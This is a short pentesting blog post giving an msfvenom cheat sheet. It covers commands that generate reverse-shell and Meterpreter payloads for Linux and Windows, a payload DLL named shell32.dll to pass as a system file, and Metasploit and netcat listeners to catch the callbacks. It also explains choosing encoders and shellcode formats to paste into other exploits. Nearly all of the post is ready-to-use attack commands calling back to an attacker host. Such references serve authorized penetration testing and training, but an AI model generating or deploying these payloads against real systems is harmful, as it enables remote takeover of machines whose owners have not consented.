Back to Posts

MSF Venom Quick Guide

Posted in Pentesting

Networks Engineered to Exploit.
- Windows/UNIX - Domains/Subnets - Initial/Post/Lateral - Low Cost VPN Ranges -

Generation Commands


Staged Meterpreter

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=YourIP LPORT=YourPort -f elf > shell-meterp.elf

Inline Meterpreter

msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=YourIP LPORT=YourPort -f elf > santas.elf


Executable with Meterpreter

msfvenom -p windows/meterpreter/reverse_tcp LHOST=YourIP LPORT=YourPort -f exe > shell-meterp.exe

Executable with Windows cmd

msfvenom -p windows/shell/reverse_tcp LHOST=YourIP LPORT=YourPort -f exe > shell-cmd.exe

Windows DLL with Windows cmd

msfvenom -p windows/shell/reverse_tcp LHOST=YourIP LPORT=YourPort -f dll > shell-cmd.dll

Execute Windows Command - generate dll named shell32.dll that will pop calc when ran

msfvenom -f dll -p windows/exec CMD="C:\windows\system32\calc.exe" -o shell32.dll



msfvenom -p cmd/unix/reverse_python LHOST=YourIP LPORT=YourPort -f raw


msfvenom -p windows/powershell_reverse_tcp LHOST=YourIP LPORT=YourPort -f raw

Usage Tips

Payload Options

msfvenom -p [payload] --payload-options
msfvenom -p windows/meterpreter/reverse_tcp --payload-options

List encoders

root@kali:/# msfvenom -l encoders

Encoding you payload in x86/shikata_ga_nai is great, but sometimes your shell code has bad chars and shikata_gi_nai may throw an error on generation. Using this command you should be able to find an encoder that will fit your parameters.

Create Listener

In Metasploit set Listener for Windows Meterpreter

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp

In Metasploit set Listener for Linux Meterpreter

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp

Set Netcat Listener

nc -lvp YourPort


You can generate the shell output in two different formats: Executable or Transform. It will depend on the scenario as to which one you’ll choose.

Executable - It’s own executable shell with an extension .elf .exe .py .php etc. Eg: You have an unstable non-interactive low priv shell and you want to get something more stable and efficient on a vulnerable windows machine. You’d generate the payload as an .exe, create a listener, upload and execute.

Transform - Raw shellcode that can be pasted into an existing exploit. The transform format will depend on what that exploit is written in. Eg: You need to create shell code to paste into your code execution exploit that’s ultimately ran by a vulnerable public facing web app in javascript. To format your shellcode, you may want to use: -f js_le (java script_little endian)

List of formats…

root@kali:/# msfvenom --help-formats 
Executable formats
	asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, jsp, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war
Transform formats
	bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

Custom Cyber Ranges >>

Read Next

Secure SSH